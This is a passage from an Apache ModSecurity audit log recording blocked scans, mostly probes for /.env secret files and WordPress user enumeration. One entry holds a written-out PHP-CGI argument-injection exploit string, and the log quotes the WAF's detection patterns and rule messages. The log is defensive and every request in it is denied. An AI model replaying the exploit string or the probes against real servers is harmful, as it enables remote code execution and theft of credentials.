(www.ecsl.cs.sunysb.edu/~maxim/cgi-bin/Link/GulperBot) Accept-Charset: utf-8 --d6f3c26f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6f3c26f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747058343665308 938 (- - -) Stopwatch2: 1747058343665308 938; combined=472, p1=426, p2=0, p3=0, p4=0, p5=45, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6f3c26f-Z-- --a6d87c61-A-- [12/May/2025:21:39:47 +0700] aCIIM-ll0ld2l7Li0sdvkgAAAIs 103.236.140.4 39870 103.236.140.4 8181 --a6d87c61-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --a6d87c61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6d87c61-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747060787325659 783 (- - -) Stopwatch2: 1747060787325659 783; combined=311, p1=273, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6d87c61-Z-- --68a98418-A-- [12/May/2025:21:39:49 +0700] aCIINRLjIumP119c9ppEdgAAABY 103.236.140.4 39934 103.236.140.4 8181 --68a98418-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --68a98418-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68a98418-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747060789536198 771 (- - -) Stopwatch2: 1747060789536198 771; combined=333, p1=295, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68a98418-Z-- --719eb150-A-- [12/May/2025:21:50:37 +0700] aCIKvRKpX3ymKhxxBshvVwAAAFc 103.236.140.4 55428 103.236.140.4 8181 --719eb150-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.186.128.154 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.186.128.154 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --719eb150-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --719eb150-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747061437095479 3130 (- - -) Stopwatch2: 1747061437095479 3130; combined=1407, p1=460, p2=834, p3=0, p4=0, p5=113, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --719eb150-Z-- --2434231d-A-- [12/May/2025:21:52:26 +0700] aCILKhLjIumP119c9ppJigAAABQ 103.236.140.4 57832 103.236.140.4 8181 --2434231d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.242.57.106 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.242.57.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2434231d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2434231d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747061546959363 2848 (- - -) Stopwatch2: 1747061546959363 2848; combined=1409, p1=461, p2=912, p3=0, p4=0, p5=35, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2434231d-Z-- --6f5afa1b-A-- [12/May/2025:22:28:59 +0700] aCITu34i-S7TW27OkGm8eAAAAMQ 103.236.140.4 50670 103.236.140.4 8181 --6f5afa1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 190.14.48.53 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 190.14.48.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6f5afa1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f5afa1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747063739726200 2652 (- - -) Stopwatch2: 1747063739726200 2652; combined=1320, p1=446, p2=841, p3=0, p4=0, p5=33, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f5afa1b-Z-- --ef5e0c56-A-- [12/May/2025:23:17:52 +0700] aCIfMBKpX3ymKhxxBsiLSwAAAEU 103.236.140.4 58744 103.236.140.4 8181 --ef5e0c56-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 206.81.12.187 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 206.81.12.187 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ef5e0c56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ef5e0c56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747066672943020 728 (- - -) Stopwatch2: 1747066672943020 728; combined=259, p1=216, p2=0, p3=0, p4=0, p5=43, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ef5e0c56-Z-- --3684d238-A-- [12/May/2025:23:20:27 +0700] aCIfy-ll0ld2l7Li0seRmQAAAIM 103.236.140.4 33790 103.236.140.4 8181 --3684d238-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --3684d238-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3684d238-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747066827382642 828 (- - -) Stopwatch2: 1747066827382642 828; combined=388, p1=343, p2=0, p3=0, p4=0, p5=44, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3684d238-Z-- --19675778-A-- [12/May/2025:23:20:29 +0700] aCIfzX4i-S7TW27OkGnMpQAAAM0 103.236.140.4 33826 103.236.140.4 8181 --19675778-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 8.134.64.249 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 8.134.64.249 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --19675778-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --19675778-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747066829471310 825 (- - -) Stopwatch2: 1747066829471310 825; combined=355, p1=307, p2=0, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19675778-Z-- --795a9c48-A-- [12/May/2025:23:34:27 +0700] aCIjE34i-S7TW27OkGnQ8AAAAMs 103.236.140.4 52182 103.236.140.4 8181 --795a9c48-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 89.38.15.177 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 89.38.15.177 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --795a9c48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --795a9c48-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747067667633222 2470 (- - -) Stopwatch2: 1747067667633222 2470; combined=1087, p1=353, p2=701, p3=0, p4=0, p5=33, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --795a9c48-Z-- --57774231-A-- [12/May/2025:23:41:19 +0700] aCIkrxLjIumP119c9ppt_AAAABY 103.236.140.4 32938 103.236.140.4 8181 --57774231-B-- GET /_static/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1 Accept-Charset: utf-8 --57774231-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57774231-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747068079016252 854 (- - -) Stopwatch2: 1747068079016252 854; combined=408, p1=368, p2=0, p3=0, p4=0, p5=40, sr=140, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57774231-Z-- --7ba6ee59-A-- [12/May/2025:23:46:06 +0700] aCIlzhKpX3ymKhxxBsiUYwAAAFE 103.236.140.4 39252 103.236.140.4 8181 --7ba6ee59-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 95.214.54.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 95.214.54.165 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7ba6ee59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ba6ee59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747068366997517 890 (- - -) Stopwatch2: 1747068366997517 890; combined=386, p1=342, p2=0, p3=0, p4=0, p5=44, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ba6ee59-Z-- --5dd1121d-A-- [13/May/2025:00:01:03 +0700] aCIpTxLjIumP119c9pp0_QAAABI 103.236.140.4 59102 103.236.140.4 8181 --5dd1121d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 159.65.99.196 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 159.65.99.196 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --5dd1121d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd1121d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747069263237930 817 (- - -) Stopwatch2: 1747069263237930 817; combined=333, p1=291, p2=0, p3=0, p4=0, p5=41, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd1121d-Z-- --85ddba20-A-- [13/May/2025:00:09:19 +0700] aCIrP34i-S7TW27OkGndSgAAANA 103.236.140.4 41442 103.236.140.4 8181 --85ddba20-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --85ddba20-C-- --85ddba20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85ddba20-E-- --85ddba20-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747069759596058 5094 (- - -) Stopwatch2: 1747069759596058 5094; combined=3546, p1=686, p2=2812, p3=0, p4=0, p5=48, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85ddba20-Z-- --708c6e4d-A-- [13/May/2025:00:25:32 +0700] aCIvDOll0ld2l7Li0sejCwAAAIc 103.236.140.4 34100 103.236.140.4 8181 --708c6e4d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 69.163.182.169 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 69.163.182.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --708c6e4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --708c6e4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747070732561746 2369 (- - -) Stopwatch2: 1747070732561746 2369; combined=1214, p1=404, p2=780, p3=0, p4=0, p5=30, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708c6e4d-Z-- --ec260d3d-A-- [13/May/2025:00:35:59 +0700] aCIxfxKpX3ymKhxxBsijCQAAAFQ 103.236.140.4 47810 103.236.140.4 8181 --ec260d3d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.62.39.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.62.39.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ec260d3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec260d3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747071359469839 3303 (- - -) Stopwatch2: 1747071359469839 3303; combined=1518, p1=553, p2=926, p3=0, p4=0, p5=39, sr=144, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec260d3d-Z-- --1e39133e-A-- [13/May/2025:01:05:20 +0700] aCI4YBKpX3ymKhxxBsirSQAAAEA 103.236.140.4 59082 103.236.140.4 8181 --1e39133e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 77.48.74.11 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 77.48.74.11 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1e39133e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e39133e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747073120505051 3286 (- - -) Stopwatch2: 1747073120505051 3286; combined=1464, p1=492, p2=940, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e39133e-Z-- --585e9662-A-- [13/May/2025:01:14:11 +0700] aCI6cxLjIumP119c9pqOcAAAAAA 103.236.140.4 42188 103.236.140.4 8181 --585e9662-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.47.97.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.47.97.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --585e9662-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --585e9662-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747073651547706 2794 (- - -) Stopwatch2: 1747073651547706 2794; combined=1325, p1=392, p2=901, p3=0, p4=0, p5=32, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --585e9662-Z-- --d750c76b-A-- [13/May/2025:01:16:00 +0700] aCI64BLjIumP119c9pqPGgAAABc 103.236.140.4 44646 103.236.140.4 8181 --d750c76b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 